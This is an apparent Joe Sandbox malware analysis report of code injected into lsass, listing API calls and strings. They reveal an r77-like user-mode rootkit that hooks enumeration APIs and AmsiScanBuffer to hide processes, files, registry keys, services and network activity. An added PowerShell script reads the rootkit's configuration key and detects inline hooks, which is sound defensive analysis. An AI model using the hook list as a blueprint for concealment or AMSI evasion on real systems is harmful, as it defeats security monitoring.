                                                                  • Opcode Fuzzy Hash: b82d1bbac2a4a5b9d6dbe5f2df15dcec51c980f52b633491719cdad5f7bdf37e
                                                                  • Instruction Fuzzy Hash: 17015732304B80C2FA10DB12A89C75D62A5F788FC0F598136DF9A43766DE3AC9898740

                                                                  Control-flow Graph

                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000046.00000002.2942740683.00000202C0AE1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000202C0AE0000, based on PE: true
                                                                  • Associated: 00000046.00000002.2942686217.00000202C0AE0000.00000002.00000001.00020000.00000000.sdmp
                                                                  • Associated: 00000046.00000002.2942785956.00000202C0AF6000.00000002.00000001.00020000.00000000.sdmp
                                                                  • Associated: 00000046.00000002.2942842412.00000202C0B01000.00000004.00000001.00020000.00000000.sdmp
                                                                  • Associated: 00000046.00000002.2942887947.00000202C0B03000.00000002.00000001.00020000.00000000.sdmp
                                                                  • Associated: 00000046.00000002.2942943407.00000202C0B09000.00000002.00000001.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_70_2_202c0ae0000_lsass.jbxd
                                                                  Similarity
                                                                  • API ID: FinalHandleNamePathlstrlen
                                                                  • String ID: \\?\
                                                                  • API String ID: 2719912262-4282027825
                                                                  • Opcode ID: d5ec68f96dae6b7ecf4cdbbeb250ae8ba7b628e03b919f4631671672637286c6
                                                                  • Instruction ID: 35760653a7c3f685937cc2e69bc4cd9b7b7f135bce10eb14f96030ddb38c35a5
                                                                  • Opcode Fuzzy Hash: d5ec68f96dae6b7ecf4cdbbeb250ae8ba7b628e03b919f4631671672637286c6
                                                                  • Instruction Fuzzy Hash: 4DF01962304781D2FB208B21E9DC76D6261F744B98F858123DB8947566DA7DC68CCB00

                                                                  Control-flow Graph

                                                                  APIs
                                                                  • GetModuleFileNameW.KERNEL32 ref: 00000202C0AE3639
                                                                  • PathFindFileNameW.SHLWAPI ref: 00000202C0AE3648
                                                                    • Part of subcall function 00000202C0AE3C74: StrCmpNIW.SHLWAPI(?,?,?,00000202C0AE254B), ref: 00000202C0AE3C8C
                                                                    • Part of subcall function 00000202C0AE3BC0: GetModuleHandleW.KERNEL32(?,?,?,?,?,00000202C0AE365F), ref: 00000202C0AE3BCE
                                                                    • Part of subcall function 00000202C0AE3BC0: GetCurrentProcess.KERNEL32(?,?,?,?,?,00000202C0AE365F), ref: 00000202C0AE3BFC
                                                                    • Part of subcall function 00000202C0AE3BC0: VirtualProtectEx.KERNEL32(?,?,?,?,?,00000202C0AE365F), ref: 00000202C0AE3C1E
                                                                    • Part of subcall function 00000202C0AE3BC0: GetCurrentProcess.KERNEL32(?,?,?,?,?,00000202C0AE365F), ref: 00000202C0AE3C39
                                                                    • Part of subcall function 00000202C0AE3BC0: VirtualProtectEx.KERNEL32(?,?,?,?,?,00000202C0AE365F), ref: 00000202C0AE3C5A
                                                                  • CreateThread.KERNELBASE ref: 00000202C0AE368F
                                                                    • Part of subcall function 00000202C0AE1D40: GetCurrentThread.KERNEL32 ref: 00000202C0AE1D4B
                                                                  Memory Dump Source
                                                                  • Source File: 00000046.00000002.2942740683.00000202C0AE1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000202C0AE0000, based on PE: true
                                                                  • Associated: 00000046.00000002.2942686217.00000202C0AE0000.00000002.00000001.00020000.00000000.sdmp
                                                                  • Associated: 00000046.00000002.2942785956.00000202C0AF6000.00000002.00000001.00020000.00000000.sdmp
                                                                  • Associated: 00000046.00000002.2942842412.00000202C0B01000.00000004.00000001.00020000.00000000.sdmp
                                                                  • Associated: 00000046.00000002.2942887947.00000202C0B03000.00000002.00000001.00020000.00000000.sdmp
                                                                  • Associated: 00000046.00000002.2942943407.00000202C0B09000.00000002.00000001.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_70_2_202c0ae0000_lsass.jbxd
                                                                  Similarity
                                                                  • API ID: Current$FileModuleNameProcessProtectThreadVirtual$CreateFindHandlePath
                                                                  • String ID:
                                                                  • API String ID: 1683269324-0
                                                                  • Opcode ID: f925565bd7d4be1ed18a10d933f5cc473e240d0c1127f16e8bee8d0f787d3ad7
                                                                  • Instruction ID: a1f9a20f98be1a09609fb87148879590297a20a8bbae3459bd4eb453fa8b818a
                                                                  • Opcode Fuzzy Hash: f925565bd7d4be1ed18a10d933f5cc473e240d0c1127f16e8bee8d0f787d3ad7
                                                                  • Instruction Fuzzy Hash: B4118472618781D2FB709B30A8CD76E2290B7A4749F52412797A6857E7EF7DC46C8A00
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000046.00000003.1782562643.00000202C0AB0000.00000040.00000400.00020000.00000000.sdmp, Offset: 00000202C0AB0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_70_3_202c0ab0000_lsass.jbxd
                                                                  Similarity
                                                                  • API ID: LibraryLoad
                                                                  • String ID:
                                                                  • API String ID: 1029625771-0
                                                                  • Opcode ID: 8f72cda2533f8c81468787ed5508378e1f4737ebbed7a3ee8edbd934de0862d8
                                                                  • Instruction ID: 7f55e3a06d079607286065f83a5004a6c8ad7ad05728e442eb34c2896bc2e82a
                                                                  • Opcode Fuzzy Hash: 8f72cda2533f8c81468787ed5508378e1f4737ebbed7a3ee8edbd934de0862d8
                                                                  • Instruction Fuzzy Hash: 3491D072B01790C7FB648F25D08CB6DB791F754B94F5681279F4A1B78ADA38D81AC700

                                                                  Control-flow Graph

                                                                  APIs
                                                                    • Part of subcall function 00000202C0AE1628: GetProcessHeap.KERNEL32 ref: 00000202C0AE1633
                                                                    • Part of subcall function 00000202C0AE1628: HeapAlloc.KERNEL32 ref: 00000202C0AE1642
                                                                    • Part of subcall function 00000202C0AE1628: RegOpenKeyExW.ADVAPI32 ref: 00000202C0AE16B2
                                                                    • Part of subcall function 00000202C0AE1628: RegOpenKeyExW.ADVAPI32 ref: 00000202C0AE16DF
                                                                    • Part of subcall function 00000202C0AE1628: RegCloseKey.ADVAPI32 ref: 00000202C0AE16F9
                                                                    • Part of subcall function 00000202C0AE1628: RegOpenKeyExW.ADVAPI32 ref: 00000202C0AE1719
                                                                    • Part of subcall function 00000202C0AE1628: RegCloseKey.ADVAPI32 ref: 00000202C0AE1734
                                                                    • Part of subcall function 00000202C0AE1628: RegOpenKeyExW.ADVAPI32 ref: 00000202C0AE1754
                                                                    • Part of subcall function 00000202C0AE1628: RegCloseKey.ADVAPI32 ref: 00000202C0AE176F
                                                                    • Part of subcall function 00000202C0AE1628: RegOpenKeyExW.ADVAPI32 ref: 00000202C0AE178F
                                                                    • Part of subcall function 00000202C0AE1628: RegCloseKey.ADVAPI32 ref: 00000202C0AE17AA
                                                                    • Part of subcall function 00000202C0AE1628: RegOpenKeyExW.ADVAPI32 ref: 00000202C0AE17CA
                                                                  • SleepEx.KERNELBASE ref: 00000202C0AE1AE3
                                                                    • Part of subcall function 00000202C0AE1628: RegCloseKey.ADVAPI32 ref: 00000202C0AE17E5
                                                                    • Part of subcall function 00000202C0AE1628: RegOpenKeyExW.ADVAPI32 ref: 00000202C0AE1805
                                                                    • Part of subcall function 00000202C0AE1628: RegCloseKey.ADVAPI32 ref: 00000202C0AE1820
                                                                    • Part of subcall function 00000202C0AE1628: RegOpenKeyExW.ADVAPI32 ref: 00000202C0AE1840
                                                                    • Part of subcall function 00000202C0AE1628: RegCloseKey.ADVAPI32 ref: 00000202C0AE185B
                                                                    • Part of subcall function 00000202C0AE1628: RegOpenKeyExW.ADVAPI32 ref: 00000202C0AE187B
                                                                    • Part of subcall function 00000202C0AE1628: RegCloseKey.ADVAPI32 ref: 00000202C0AE1896
                                                                    • Part of subcall function 00000202C0AE1628: RegCloseKey.ADVAPI32 ref: 00000202C0AE18A0
                                                                  Memory Dump Source
                                                                  • Source File: 00000046.00000002.2942740683.00000202C0AE1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000202C0AE0000, based on PE: true
                                                                  • Associated: 00000046.00000002.2942686217.00000202C0AE0000.00000002.00000001.00020000.00000000.sdmp
                                                                  • Associated: 00000046.00000002.2942785956.00000202C0AF6000.00000002.00000001.00020000.00000000.sdmp
                                                                  • Associated: 00000046.00000002.2942842412.00000202C0B01000.00000004.00000001.00020000.00000000.sdmp
                                                                  • Associated: 00000046.00000002.2942887947.00000202C0B03000.00000002.00000001.00020000.00000000.sdmp
                                                                  • Associated: 00000046.00000002.2942943407.00000202C0B09000.00000002.00000001.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_70_2_202c0ae0000_lsass.jbxd
                                                                  Similarity
                                                                  • API ID: CloseOpen$Heap$AllocProcessSleep
                                                                  • String ID:
                                                                  • API String ID: 948135145-0
                                                                  • Opcode ID: 65153283aa6c96ced916157d2f86422634ff98b4549c9c2683df96b80b9c3d6c
                                                                  • Instruction ID: 2a8d246c19d9524347535c19656ffa5c1f21575d3b0b54c7ce5de3e3851543a3
                                                                  • Opcode Fuzzy Hash: 65153283aa6c96ced916157d2f86422634ff98b4549c9c2683df96b80b9c3d6c
                                                                  • Instruction Fuzzy Hash: D731E171610BA1C2FB509B26D9DD36E62A4EB84FC4F0650239FA987797EE24C878C250

                                                                  Control-flow Graph

                                                                  • Graph image not reproduced; API calls shown on the graph nodes: GetModuleHandleA, GetProcAddress, StrCmpNIW, lstrlenW
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000046.00000002.2942740683.00000202C0AE1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000202C0AE0000, based on PE: true
                                                                  • Associated: 00000046.00000002.2942686217.00000202C0AE0000.00000002.00000001.00020000.00000000.sdmp
                                                                  • Associated: 00000046.00000002.2942785956.00000202C0AF6000.00000002.00000001.00020000.00000000.sdmp
                                                                  • Associated: 00000046.00000002.2942842412.00000202C0B01000.00000004.00000001.00020000.00000000.sdmp
                                                                  • Associated: 00000046.00000002.2942887947.00000202C0B03000.00000002.00000001.00020000.00000000.sdmp
                                                                  • Associated: 00000046.00000002.2942943407.00000202C0B09000.00000002.00000001.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_70_2_202c0ae0000_lsass.jbxd
                                                                  Similarity
                                                                  • API ID: lstrlen$FileHandleModuleName$AddressCloseFindOpenPathProcProcess
                                                                  • String ID: NtQueryObject$\Device\Nsi$ntdll.dll
                                                                  • API String ID: 2119608203-3850299575
                                                                  • Opcode ID: eeb4c9d13e4d9331326a316f022dbcf34e2f04a28c739e06152b1c27ab991b03
                                                                  • Instruction ID: f255fe2d23540f94120cab3b16bf883902439de12d91482f99c843968eb1158d
                                                                  • Opcode Fuzzy Hash: eeb4c9d13e4d9331326a316f022dbcf34e2f04a28c739e06152b1c27ab991b03
                                                                  • Instruction Fuzzy Hash: EAB19D622107E4C6FB688F25D88C7ADA7A4FB44B84F465017EFA953796DB35CC68C340
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000046.00000002.2942740683.00000202C0AE1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000202C0AE0000, based on PE: true
                                                                  • Associated: 00000046.00000002.2942686217.00000202C0AE0000.00000002.00000001.00020000.00000000.sdmp
                                                                  • Associated: 00000046.00000002.2942785956.00000202C0AF6000.00000002.00000001.00020000.00000000.sdmp
                                                                  • Associated: 00000046.00000002.2942842412.00000202C0B01000.00000004.00000001.00020000.00000000.sdmp
                                                                  • Associated: 00000046.00000002.2942887947.00000202C0B03000.00000002.00000001.00020000.00000000.sdmp
                                                                  • Associated: 00000046.00000002.2942943407.00000202C0B09000.00000002.00000001.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_70_2_202c0ae0000_lsass.jbxd
                                                                  Similarity
                                                                  • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                                  • String ID:
                                                                  • API String ID: 3140674995-0
                                                                  • Opcode ID: 83b7811ed3dfc20f87799ca4d6a8862c7cd88f8e2de3ef0f3c1075f59fefca25
                                                                  • Instruction ID: c58ad0f624f02dcfc9d216364daf779c60b00d3df3fe6753b4f3d5f19fc37c01
                                                                  • Opcode Fuzzy Hash: 83b7811ed3dfc20f87799ca4d6a8862c7cd88f8e2de3ef0f3c1075f59fefca25
                                                                  • Instruction Fuzzy Hash: 53313A72205B80CAFB648F60E8983ED7364F788744F45412BDB8E47A95DF39C658C710
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000046.00000002.2942740683.00000202C0AE1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000202C0AE0000, based on PE: true
                                                                  • Associated: 00000046.00000002.2942686217.00000202C0AE0000.00000002.00000001.00020000.00000000.sdmp
                                                                  • Associated: 00000046.00000002.2942785956.00000202C0AF6000.00000002.00000001.00020000.00000000.sdmp
                                                                  • Associated: 00000046.00000002.2942842412.00000202C0B01000.00000004.00000001.00020000.00000000.sdmp
                                                                  • Associated: 00000046.00000002.2942887947.00000202C0B03000.00000002.00000001.00020000.00000000.sdmp
                                                                  • Associated: 00000046.00000002.2942943407.00000202C0B09000.00000002.00000001.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_70_2_202c0ae0000_lsass.jbxd
                                                                  Similarity
                                                                  • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                                  • String ID:
                                                                  • API String ID: 1239891234-0
                                                                  • Opcode ID: 73b818fc325fecaacad8de34b866da11aee815d79a746152a1b7109c0a3c76cf
                                                                  • Instruction ID: 78740f6651e28244420e0110bdc5b76e43b769878cef935dcc801556f4bb7619
                                                                  • Opcode Fuzzy Hash: 73b818fc325fecaacad8de34b866da11aee815d79a746152a1b7109c0a3c76cf
                                                                  • Instruction Fuzzy Hash: 05314B32214F80C6EB608F25E88879E73A4F788754F510227EB9D47BAADF38C559CB00

                                                                  Control-flow Graph

                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000046.00000002.2942740683.00000202C0AE1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000202C0AE0000, based on PE: true
                                                                  • Associated: 00000046.00000002.2942686217.00000202C0AE0000.00000002.00000001.00020000.00000000.sdmp
                                                                  • Associated: 00000046.00000002.2942785956.00000202C0AF6000.00000002.00000001.00020000.00000000.sdmp
                                                                  • Associated: 00000046.00000002.2942842412.00000202C0B01000.00000004.00000001.00020000.00000000.sdmp
                                                                  • Associated: 00000046.00000002.2942887947.00000202C0B03000.00000002.00000001.00020000.00000000.sdmp
                                                                  • Associated: 00000046.00000002.2942943407.00000202C0B09000.00000002.00000001.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_70_2_202c0ae0000_lsass.jbxd
                                                                  Similarity
                                                                  • API ID: Heap$CloseOpenProcess$Alloc$EnumFreeInfoQueryValuelstrlen
                                                                  • String ID: SOFTWARE\dialerconfig$paths$pid$process_names$service_names$startup$tcp_local$tcp_remote$udp
                                                                  • API String ID: 2135414181-2879589442
                                                                  • Opcode ID: 50c73d645853b92a642b33fc6a066fdc959384cfa368f387aec294c2099e88a8
                                                                  • Instruction ID: 63c30d14b03f38bca80fdeb9590442db81523b50f5b4cbe84837049985a5c024
                                                                  • Opcode Fuzzy Hash: 50c73d645853b92a642b33fc6a066fdc959384cfa368f387aec294c2099e88a8
                                                                  • Instruction Fuzzy Hash: AE710736210B50C6FB109F65E8DCA9D23A9F784F88F425123DB9E47B6ADE39C458C744

                                                                  Control-flow Graph

                                                                  APIs
                                                                  • GetCurrentThread.KERNEL32 ref: 00000202C0AE1D4B
                                                                    • Part of subcall function 00000202C0AE20C4: GetModuleHandleA.KERNEL32(?,?,?,00000202C0AE1D7D), ref: 00000202C0AE20DC
                                                                    • Part of subcall function 00000202C0AE20C4: GetProcAddress.KERNEL32(?,?,?,00000202C0AE1D7D), ref: 00000202C0AE20ED
                                                                    • Part of subcall function 00000202C0AE5F60: GetCurrentThreadId.KERNEL32 ref: 00000202C0AE5F9B
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000046.00000002.2942740683.00000202C0AE1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000202C0AE0000, based on PE: true
                                                                  • Associated: 00000046.00000002.2942686217.00000202C0AE0000.00000002.00000001.00020000.00000000.sdmp
                                                                  • Associated: 00000046.00000002.2942785956.00000202C0AF6000.00000002.00000001.00020000.00000000.sdmp
                                                                  • Associated: 00000046.00000002.2942842412.00000202C0B01000.00000004.00000001.00020000.00000000.sdmp
                                                                  • Associated: 00000046.00000002.2942887947.00000202C0B03000.00000002.00000001.00020000.00000000.sdmp
                                                                  • Associated: 00000046.00000002.2942943407.00000202C0B09000.00000002.00000001.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_70_2_202c0ae0000_lsass.jbxd
                                                                  Similarity
                                                                  • API ID: CurrentThread$AddressHandleModuleProc
                                                                  • String ID: AmsiScanBuffer$EnumServiceGroupW$EnumServicesStatusExW$NtDeviceIoControlFile$NtEnumerateKey$NtEnumerateValueKey$NtQueryDirectoryFile$NtQueryDirectoryFileEx$NtQuerySystemInformation$NtResumeThread$PdhGetFormattedCounterArrayW$PdhGetRawCounterArrayW$advapi32.dll$amsi.dll$ntdll.dll$pdh.dll$sechost.dll
                                                                  • API String ID: 4175298099-4225371247
                                                                  • Opcode ID: 89246b417a86cb3eef481aa141f8dfd28da3205d5bec25beb87351269da72666
                                                                  • Instruction ID: 93b880e27aeaa93a52f83b01557f87b5b855ee68516ad30953b20023d173a75b
                                                                  • Opcode Fuzzy Hash: 89246b417a86cb3eef481aa141f8dfd28da3205d5bec25beb87351269da72666
                                                                  • Instruction Fuzzy Hash: 3D4143A5100B8AE0FE15EF64E8DDADC2322B740358F835413D769071B79E79CA5ED391
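The string tables of the two functions above give a responder two host artefacts to check directly: a configuration key `SOFTWARE\dialerconfig` with the entries `paths`, `pid`, `process_names`, `service_names`, `startup`, `tcp_local`, `tcp_remote` and `udp`, and the set of user-mode exports (in ntdll.dll, advapi32.dll, sechost.dll, pdh.dll and amsi.dll) that the function whose API list starts at 00000202C0AE1D4B resolves through GetModuleHandleA/GetProcAddress. Together with the earlier function that resolves NtQueryObject and compares against `\Device\Nsi`, the device iphlpapi and netstat talk to when they read the TCP/UDP tables, and the `\GPU Engine(*)` counter paths in the later blocks, this is the hook set of a user-mode rootkit that filters process, file, registry, service, network and GPU-usage enumeration from other processes; the entry names and hook list match those of the public r77 rootkit with its `$77` prefix renamed. The following PowerShell triage script is an added example written for this page, not code from the report or from the sample. It opens the configuration key by exact name in HKLM and HKCU (the report does not say which hive, so both are tried) and reads the first 16 bytes of each listed export inside its own process to spot a trampoline. The trampoline patterns and the x64 syscall-stub prologue `4C 8B D1 B8` are general x64 knowledge, not taken from the report; the script assumes 64-bit Windows on x64 and 64-bit PowerShell run as an administrator.

```powershell
# Added triage example for this report's findings; not code from the sample or
# from Joe Sandbox. Assumes 64-bit Windows on x64, run from 64-bit PowerShell
# as an administrator. Key name and entry names come from the report's string
# table; the hive is not stated there, so both HKLM and HKCU are tried.

$ConfigSubPath = 'SOFTWARE\dialerconfig'
$ConfigNames   = 'paths','pid','process_names','service_names','startup','tcp_local','tcp_remote','udp'

# Exports the sample resolves for hooking (module -> functions), from the report.
$HookTargets = [ordered]@{}
$HookTargets['ntdll.dll']    = 'NtQuerySystemInformation','NtResumeThread','NtQueryDirectoryFile','NtQueryDirectoryFileEx'
$HookTargets['ntdll.dll']   += 'NtEnumerateKey','NtEnumerateValueKey','NtDeviceIoControlFile'
$HookTargets['advapi32.dll'] = 'EnumServiceGroupW','EnumServicesStatusExW'
$HookTargets['sechost.dll']  = 'EnumServiceGroupW','EnumServicesStatusExW'
$HookTargets['pdh.dll']      = 'PdhGetRawCounterArrayW','PdhGetFormattedCounterArrayW'
$HookTargets['amsi.dll']     = 'AmsiScanBuffer'

if (-not ('HookCheck.Native' -as [type])) {
    Add-Type -Namespace HookCheck -Name Native -MemberDefinition @'
[DllImport("kernel32.dll", CharSet = CharSet.Ansi, SetLastError = true)]
public static extern IntPtr LoadLibraryA(string name);
[DllImport("kernel32.dll", CharSet = CharSet.Ansi, SetLastError = true)]
public static extern IntPtr GetProcAddress(IntPtr module, string name);
'@
}
$Native = [HookCheck.Native]

function Get-RootkitConfig {
    # Open the key by exact name. Enumeration (Get-ChildItem, reg query) goes
    # through NtEnumerateKey/NtEnumerateValueKey, both on the hook list, and can
    # be filtered; NtOpenKey/NtQueryValueKey are not on that list.
    foreach ($hive in 'HKLM:','HKCU:') {
        $path = Join-Path $hive $ConfigSubPath
        if (-not (Test-Path -LiteralPath $path)) { continue }
        $key = Get-Item -LiteralPath $path
        $entries = [ordered]@{ Key = $path }
        foreach ($name in $ConfigNames) {
            $sub = Join-Path $path $name
            if (Test-Path -LiteralPath $sub) {
                # Entry stored as a subkey: its value names come from enumeration
                # and may be filtered if the hooks are active in this process.
                $entries[$name] = @((Get-Item -LiteralPath $sub).GetValueNames())
            } else {
                $entries[$name] = $key.GetValue($name)   # direct read, not enumerated
            }
        }
        [pscustomobject]$entries
    }
}

function Test-InlineHook {
    param([string]$Module, [string]$Function)
    # LoadLibraryA returns the existing base if the module is already mapped and
    # otherwise maps it read-only for us (pdh.dll and amsi.dll usually are not loaded).
    $mod = $Native::LoadLibraryA($Module)
    if ($mod -eq [IntPtr]::Zero) { return }
    $fn = $Native::GetProcAddress($mod, $Function)
    if ($fn -eq [IntPtr]::Zero) { return }
    $b = New-Object byte[] 16
    [System.Runtime.InteropServices.Marshal]::Copy($fn, $b, 0, 16)

    # Trampoline shapes inline hooks commonly write over a prologue (general x64
    # knowledge, assumed here, not taken from the report):
    #   E9 rel32           jmp rel32
    #   FF 25 disp32       jmp [rip+disp32]
    #   48 B8 imm64 FF E0  mov rax, imm64; jmp rax
    #   68 imm32 C3        push imm32; ret
    $trampoline = (
        ($b[0] -eq 0xE9) -or
        ($b[0] -eq 0xFF -and $b[1] -eq 0x25) -or
        ($b[0] -eq 0x48 -and $b[1] -eq 0xB8 -and $b[10] -eq 0xFF -and $b[11] -eq 0xE0) -or
        ($b[0] -eq 0x68 -and $b[5] -eq 0xC3)
    )
    # Every Nt* export of x64 ntdll is a syscall stub beginning with
    # mov r10, rcx; mov eax, imm32 (4C 8B D1 B8); anything else was overwritten.
    $stubIntact = $true
    if ($Module -eq 'ntdll.dll' -and $Function -like 'Nt*') {
        $stubIntact = ($b[0] -eq 0x4C -and $b[1] -eq 0x8B -and $b[2] -eq 0xD1 -and $b[3] -eq 0xB8)
    }
    [pscustomobject]@{
        Module     = $Module
        Function   = $Function
        Address    = '0x{0:X}' -f $fn.ToInt64()
        Prologue   = ($b | ForEach-Object { '{0:X2}' -f $_ }) -join ' '
        Suspicious = ($trampoline -or -not $stubIntact)
    }
}

$config = Get-RootkitConfig
if ($config) { Write-Warning 'Rootkit configuration key found:'; $config | Format-List }
else { Write-Host "No $ConfigSubPath key under HKLM or HKCU." }

$results = foreach ($module in $HookTargets.Keys) {
    foreach ($function in $HookTargets[$module]) {
        Test-InlineHook -Module $module -Function $function
    }
}
$results | Sort-Object Suspicious -Descending |
    Format-Table Module, Function, Address, Suspicious, Prologue -AutoSize
```

Two caveats when reading the output. The prologue check only sees hooks installed in the PowerShell process it runs in; a process the sample never injected into will look clean even on an infected host, so confirm a hit by comparing the bytes against a clean ntdll.dll from install media or by inspecting a suspect process under a debugger. And `Suspicious` means "investigate", not "infected": EDR products and Microsoft hotpatching also rewrite prologues with a `jmp`, so a trampoline alone is not proof, whereas the presence of the `dialerconfig` key with these eight entry names is a much more specific indicator.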

                                                                  Control-flow Graph

                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000046.00000002.2942740683.00000202C0AE1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000202C0AE0000, based on PE: true
                                                                  • Associated: 00000046.00000002.2942686217.00000202C0AE0000.00000002.00000001.00020000.00000000.sdmp
                                                                  • Associated: 00000046.00000002.2942785956.00000202C0AF6000.00000002.00000001.00020000.00000000.sdmp
                                                                  • Associated: 00000046.00000002.2942842412.00000202C0B01000.00000004.00000001.00020000.00000000.sdmp
                                                                  • Associated: 00000046.00000002.2942887947.00000202C0B03000.00000002.00000001.00020000.00000000.sdmp
                                                                  • Associated: 00000046.00000002.2942943407.00000202C0B09000.00000002.00000001.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_70_2_202c0ae0000_lsass.jbxd
                                                                  Similarity
                                                                  • API ID: Heap$Process$Alloc$Free$EnumInfoQueryValuelstrlen
                                                                  • String ID: d
                                                                  • API String ID: 2005889112-2564639436
                                                                  • Opcode ID: cc1628f5bdf40f209b9d07d80321b7de87e74088023d72a2e45934eb7399fe90
                                                                  • Instruction ID: d3bbb0d6a33b11fdeba87f49bf8526c0ef2bbfe18e70a51474c0d76e55c01624
                                                                  • Opcode Fuzzy Hash: cc1628f5bdf40f209b9d07d80321b7de87e74088023d72a2e45934eb7399fe90
                                                                  • Instruction Fuzzy Hash: 07512772200B84C6EB54CF62E48C35EB7A5F788F99F458126DB8A0776ADF39C4598B00
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000046.00000003.1782562643.00000202C0AB0000.00000040.00000400.00020000.00000000.sdmp, Offset: 00000202C0AB0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_70_3_202c0ab0000_lsass.jbxd
                                                                  Similarity
                                                                  • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                                  • String ID: destructor'$ned$restrict(
                                                                  • API String ID: 190073905-924718728
                                                                  • Opcode ID: c075132b8ffb7c8aa12930f0dbbf7461f30bd8bef12e3c9d76da9105ae1b8dff
                                                                  • Instruction ID: ae715c0618650c797de8d196486db3eda3e60c1cf3996309e67a6a542324cfbc
                                                                  • Opcode Fuzzy Hash: c075132b8ffb7c8aa12930f0dbbf7461f30bd8bef12e3c9d76da9105ae1b8dff
                                                                  • Instruction Fuzzy Hash: CE81A131600741C6FB60AB76A8CD3AD26E4AB89780F1B5427AB09477A7DF7DC98D8700

                                                                  Control-flow Graph

                                                                  • Control-flow graph (graph rendering not preserved): function 202c0aed258-202c0aed3cf; API calls in the graph: GetLastError, FlsGetValue, FlsSetValue, SetLastError; internal calls: 202c0aedafc, 202c0aecb78, 202c0aecfc4, 202c0aedb74
                                                                  APIs
                                                                  • GetLastError.KERNEL32(?,?,?,00000202C0AF0E9B,?,?,?,00000202C0AF088C,?,?,?,00000202C0AECC7F), ref: 00000202C0AED267
                                                                  • FlsGetValue.KERNEL32(?,?,?,00000202C0AF0E9B,?,?,?,00000202C0AF088C,?,?,?,00000202C0AECC7F), ref: 00000202C0AED27C
                                                                  • FlsSetValue.KERNEL32(?,?,?,00000202C0AF0E9B,?,?,?,00000202C0AF088C,?,?,?,00000202C0AECC7F), ref: 00000202C0AED29D
                                                                  • FlsSetValue.KERNEL32(?,?,?,00000202C0AF0E9B,?,?,?,00000202C0AF088C,?,?,?,00000202C0AECC7F), ref: 00000202C0AED2CA
                                                                  • FlsSetValue.KERNEL32(?,?,?,00000202C0AF0E9B,?,?,?,00000202C0AF088C,?,?,?,00000202C0AECC7F), ref: 00000202C0AED2DB
                                                                  • FlsSetValue.KERNEL32(?,?,?,00000202C0AF0E9B,?,?,?,00000202C0AF088C,?,?,?,00000202C0AECC7F), ref: 00000202C0AED2EC
                                                                  • SetLastError.KERNEL32(?,?,?,00000202C0AF0E9B,?,?,?,00000202C0AF088C,?,?,?,00000202C0AECC7F), ref: 00000202C0AED307
                                                                  • FlsGetValue.KERNEL32(?,?,?,?,?,?,?,00000202C0AF0E9B,?,?,?,00000202C0AF088C,?,?,?,00000202C0AECC7F), ref: 00000202C0AED33D
                                                                  • FlsSetValue.KERNEL32(?,?,00000001,00000202C0AEF0FC,?,?,?,?,00000202C0AEC3CF,?,?,?,?,?,00000202C0AE7EE0), ref: 00000202C0AED35C
                                                                    • Part of subcall function 00000202C0AEDAFC: HeapAlloc.KERNEL32(?,?,00000000,00000202C0AED432,?,?,?,00000202C0AEDAE5,?,?,?,?,00000202C0AEDBA8), ref: 00000202C0AEDB51
                                                                  • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,00000202C0AF0E9B,?,?,?,00000202C0AF088C,?,?,?,00000202C0AECC7F), ref: 00000202C0AED384
                                                                    • Part of subcall function 00000202C0AEDB74: HeapFree.KERNEL32(?,?,?,?,?,?,?,00000202C0AE643A), ref: 00000202C0AEDB8A
                                                                    • Part of subcall function 00000202C0AEDB74: GetLastError.KERNEL32(?,?,?,?,?,?,?,00000202C0AE643A), ref: 00000202C0AEDB94
                                                                  • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,00000202C0AF0E9B,?,?,?,00000202C0AF088C,?,?,?,00000202C0AECC7F), ref: 00000202C0AED395
                                                                  • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,00000202C0AF0E9B,?,?,?,00000202C0AF088C,?,?,?,00000202C0AECC7F), ref: 00000202C0AED3A6
                                                                  Memory Dump Source
                                                                  • Source File: 00000046.00000002.2942740683.00000202C0AE1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000202C0AE0000, based on PE: true
